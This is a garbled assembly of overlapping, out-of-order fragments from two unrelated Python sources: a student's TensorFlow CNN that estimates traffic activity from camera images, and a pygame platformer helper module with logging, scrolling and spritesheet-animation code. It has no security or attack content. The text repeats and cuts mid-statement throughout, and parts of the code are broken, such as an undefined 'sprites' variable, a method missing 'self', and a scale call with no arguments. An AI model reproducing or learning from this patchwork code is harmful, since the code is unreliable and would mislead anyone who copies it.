It is loosely based on TF image classification examples and", "x_train / 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test", "#output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor =", "# Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()],", "np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x", "= x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model", "epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json()", "tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32,", "of images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value =", "y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train =", "16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train", "<NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains a neural", "#y = np.append(y, [y_value]) y[i] = y_value # convert image to a tensor", "Final Project This python file trains a neural network that predicts an activity", "y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\")", "img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = 
tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160,", "images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]]", "dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch of images sess", "tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test / 16 #(x_train,", "= tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220)", "a traffic camera This is an initial attempt at doing regression based on", "# squish it down a bit img_tensor /= 255.0 # normalize to [0,1]", "as pd from sklearn import model_selection import tensorflow as tf from pathlib import", "on a jpg image from a traffic camera This is an initial attempt", "= tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test", "y_train / 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data()", "range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array =", "from a traffic camera This is an initial attempt at doing regression based", "tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same',", "pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): #", "activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', 
activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2))", "3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess", "classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample", "padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25))", "tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project", "160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and", "axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test,", "3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same',", "optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True", "as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final", "y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test =", "tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = 
tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240,", "Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df)", "tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor /= 255.0 #", "= pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data):", "input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25))", "it down a bit img_tensor /= 255.0 # normalize to [0,1] range #", "= tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array =", "tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value)", "= tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor /= 255.0", "sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array", "level based on a jpg image from a traffic camera This is an", "image from a traffic camera This is an initial attempt at doing regression", "image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view", "activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', 
loss='mse',", "img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor", "that predicts an activity level based on a jpg image from a traffic", "indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array,", "model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\",", "#print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert image to a", "Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains", "network that predicts an activity level based on a jpg image from a", ") # save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) # save", "/ 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\")", "#print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output", "= tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160,", "data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80,", "regression based on image data. 
It is loosely based on TF image classification", "a jpg image from a traffic camera This is an initial attempt at", "model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100,", "This python file trains a neural network that predicts an activity level based", "model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam'," ]
[ "for Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path", "messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\",", "############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x: float = 0", "= 0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size,", "print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) #############################", "scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y:", "add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites =", ">= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict", "(line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x:", "/ 10 # Don't allow scrolling off the map # X axis if", "= 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\"", "Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names)", "- scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1]", "columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width()", "is number of rows \"\"\" spritesheet = 
pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols", "Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10", "Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log messages", "- scroll_offset[1] ) / 10 # Don't allow scrolling off the map #", "- (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max", "range(rows): # loop through the number of rows y_pos = row_num * sprite_height", "Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0:", "the width x_pos = col_num * sprite_width row_images = [] for row_num in", "multiplying # the column that its on by the width x_pos = col_num", "} @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\")", "(map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" )", "\"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0]", "number of columns for col_num in range(cols): # get the x position of", "[] # loop through the number of columns for col_num in range(cols): #", "Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis", "= (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue", "axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y", "self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] 
for i in", "spritesheet cols is number of columns rows is number of rows \"\"\" spritesheet", "max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size):", "str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" )", "range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy()", "loop through the number of rows y_pos = row_num * sprite_height sprite_rect =", "\"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str):", "float = 0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def", "/ 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10", "class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = {", "cols is number of columns rows is number of rows \"\"\" spritesheet =", "setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y", "spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows", "@staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod", "= [] for row_num in range(rows): # loop through the number of rows", "self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]]", "[] 
stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append()", "### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class", "\"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def", "10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 #", "/ cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = []", "Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y =", "= [] stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append()", "y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite) rows.append(row_images)", "Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y -", "scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player", "0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y", "for row_num in range(rows): # loop through the number of rows y_pos =", "handling class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float =", "( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1]", "ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log", "# X axis if 
Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >=", "Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y +=", ") @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += (", "scroll_offset[1] ) / 10 # Don't allow scrolling off the map # X", "through the number of rows y_pos = row_num * sprite_height sprite_rect = (x_pos,", "print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal(", "for col_num in range(cols): # get the x position of the sprite by", "Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x", "@staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0]", "is number of columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path)", "i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites", "{error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x: float", "Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ###", "Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict =", "scrolling off the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x =", "= self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): 
self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self):", "\"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str):", "Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i", "= (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\"", "@staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)}", "sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = []", "number of rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width,", "############################# class Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float", "* tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod", "Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### ####################", "sprite_width row_images = [] for row_num in range(rows): # loop through the number", "(screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling:", "( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling", "50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\"", "row_images = [] for row_num in range(rows): # loop through the number of", 
"Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### #############################", "the sprite by multiplying # the column that its on by the width", "def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def", "get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet cols is number", "{message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}:", "by the width x_pos = col_num * sprite_width row_images = [] for row_num", "### Scroll handling class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y:", "class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for", "col_num in range(cols): # get the x position of the sprite by multiplying", "pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent ####################", "= [] # loop through the number of columns for col_num in range(cols):", "copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the", "# get the x position of the sprite by multiplying # the column", "the column that its on by the width x_pos = col_num * sprite_width", "0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def 
__init__(self,image_path,cols,rows,dict_names): self.sprites", "float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup", "from the spritesheet cols is number of columns rows is number of rows", "= 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names):", "Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y", "squashed_sprites = [] stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale()", "[] for row_num in range(rows): # loop through the number of rows y_pos", "Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ###", "class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\":", "* tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50", "{str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class Scrolling:", "[] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols,", "through the number of columns for col_num in range(cols): # get the x", "= 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] *", "player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling off", "############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger:", "(map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) -", 
"sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite) rows.append(row_images) return", "{Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x +=", "#################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\",", "x_pos = col_num * sprite_width row_images = [] for row_num in range(rows): #", "the number of rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos,", "that its on by the width x_pos = col_num * sprite_width row_images =", "+= ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow", "############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class", "\"\"\" Tools for Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib", "col_num * sprite_width row_images = [] for row_num in range(rows): # loop through", "squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images", "for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict:", "def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i", "\"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] *", "its on by the width x_pos = col_num * sprite_width row_images = []", "\"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\")", "load_dict(self,dict_names): for i in range(len(sprites)): 
self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in", "0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations:", "### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\":", "def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def", "for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows):", "class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float = 0", "(x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite)", "\"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\":", "= col_num * sprite_width row_images = [] for row_num in range(rows): # loop", "sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw ==", "\"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO]", "sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite) rows.append(row_images) return rows", "### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x:", "elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites =", "0 
max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size,", "def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites", "by multiplying # the column that its on by the width x_pos =", "= 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if", "0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float = 0", "rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite", "Scroll handling class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float", "* sprite_width row_images = [] for row_num in range(rows): # loop through the", "= Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def", "get the images from the spritesheet cols is number of columns rows is", "number of columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width", "warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error:", "@staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll", "tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log(", 